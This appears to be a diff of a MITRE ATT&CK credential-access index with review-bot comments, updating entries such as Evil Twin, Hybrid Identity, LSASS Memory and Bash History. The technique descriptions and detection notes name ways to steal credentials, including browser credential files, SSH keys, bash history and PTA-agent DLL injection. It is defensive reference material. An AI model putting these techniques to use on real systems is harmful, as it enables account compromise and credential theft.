+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
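Review bot: the new T1557.004 Evil Twin entry lists both credential-access and collection under kill_chain_phases, so the same block should also be emitted under the collection tactic section of this index; confirm it is. It ships with x_mitre_detection: '' and atomic_tests: [], so the only detection guidance is the two Network Traffic data sources. Two upstream text issues are carried over: "the adversary may able to monitor" is missing "be", and the description literal keeps a trailing space before the closing quote ("... illegitimate Wi-Fi access points. "), harmless but it will churn every time the string is regenerated. In the T1556.007 description the Azure AD to Entra ID rename correctly leaves the (Citation: Azure AD Connect for Read Teamers) and (Citation: AADInternals Azure AD On-Prem to Cloud) keys untouched, since those must match source_name in external_references.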
@@ -50239,9 +51009,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -50250,21 +51020,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -50304,55 +51075,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
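Review bot: the T1555.003 removals here (x_mitre_platforms, x_mitre_domains, x_mitre_contributors, object_marking_refs, id, type, created, created_by_ref and external_references) are not real deletions: every field is re-added with identical values further down in the same technique (the id attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8 and the same five references reappear in a later hunk), so the substantive change is the modified timestamp, version 1.1 to 1.2, revoked: false, the spec bump, and the dropped x_mitre_permissions_required. A deterministic key order in the exporter would collapse this into a handful of lines.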
@@ -50382,6 +51108,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -50391,18 +51123,53 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests:
- name: Search macOS Safari Cookies
@@ -50442,7 +51209,7 @@ credential-access:
name: sh
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -50479,23 +51246,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -50528,21 +51295,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
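Review bot: swapping the dead lockstepgroup.com URL for a web.archive.org snapshot and updating the Retrieved date is the right fix, and because source_name solution_monitor_dhcp_scopes is unchanged the (Citation: solution_monitor_dhcp_scopes) marker in the T1557.003 detection text still resolves. The snapshot is dated 2023-12-02 while Retrieved now says September 12, 2024, which is consistent (that is when the archived copy was retrieved) but worth a glance since it is mirrored from upstream.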
@@ -50553,7 +51319,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -50587,7 +51353,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -50615,7 +51381,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -50626,9 +51392,8 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests:
- name: Discover Private SSH Keys
@@ -50712,7 +51477,7 @@ credential-access:
name: sh
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
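Review bot: the modified timestamp for T1557.001 goes backwards, from 2023-04-25T14:00:00.188Z to 2022-10-25T15:46:55.393Z, while every other technique in this diff moves forward to a 2024 date, and this entry keeps x_mitre_attack_spec_version: 3.0.0 in the next hunk instead of the 3.2.0 used everywhere else. That looks like the entry was regenerated from a stale STIX object; verify which upstream version of T1557.001 this index is meant to track before merging.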
@@ -50820,12 +51585,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -50862,6 +51626,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -50874,7 +51639,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -50924,12 +51689,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -50955,6 +51719,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -50970,18 +51735,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
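Review bot: the platform rename for T1110.003 (`- - Azure AD`, `- - Office 365` and `- - Google Workspace` replaced by `+ - Office Suite` and `+ - Identity Provider`) drops three platform names that other artifacts in the repo may be keyed on; confirm that any per-platform index derived from these platform lists is regenerated in the same change, otherwise those indexes go stale against this data. The bump to `x_mitre_version: '1.6'` is consistent with the rename.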
@@ -51008,14 +51773,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -51026,13 +51788,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -51046,6 +51808,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -51056,12 +51819,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -51136,7 +51899,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -51182,7 +51944,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
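Review bot: `modified` for T1558.001 moves backwards here, from `2022-04-25T14:00:00.188Z` to `2020-11-05T16:07:03.779Z`; every other timestamp in the patch moves forward, so this one looks like the generator picked up a different source object rather than a newer one. Verify it against the upstream ATT&CK entry before merging, because a regressed modified date will make any freshness check treat the technique as unchanged.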
@@ -51217,16 +51979,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
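Review bot: `- x_mitre_attack_spec_version: 2.1.0` is removed from T1558.001 together with `spec_version`, and unlike the other techniques in this patch no replacement `x_mitre_attack_spec_version: 3.2.0` appears in the visible hunk; check that the field is re-emitted elsewhere in the T1558.001 object, as it is for T1110.003 and T1528, or the object is left without an attack spec version at all. In the same hunk the T1649 description change from Azure AD to Entra ID correctly leaves the citation key `O365 Blog Azure AD Device IDs` untouched, since that is a lookup key rather than prose.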
@@ -51236,21 +51996,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -51299,33 +52061,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -51340,20 +52080,38 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
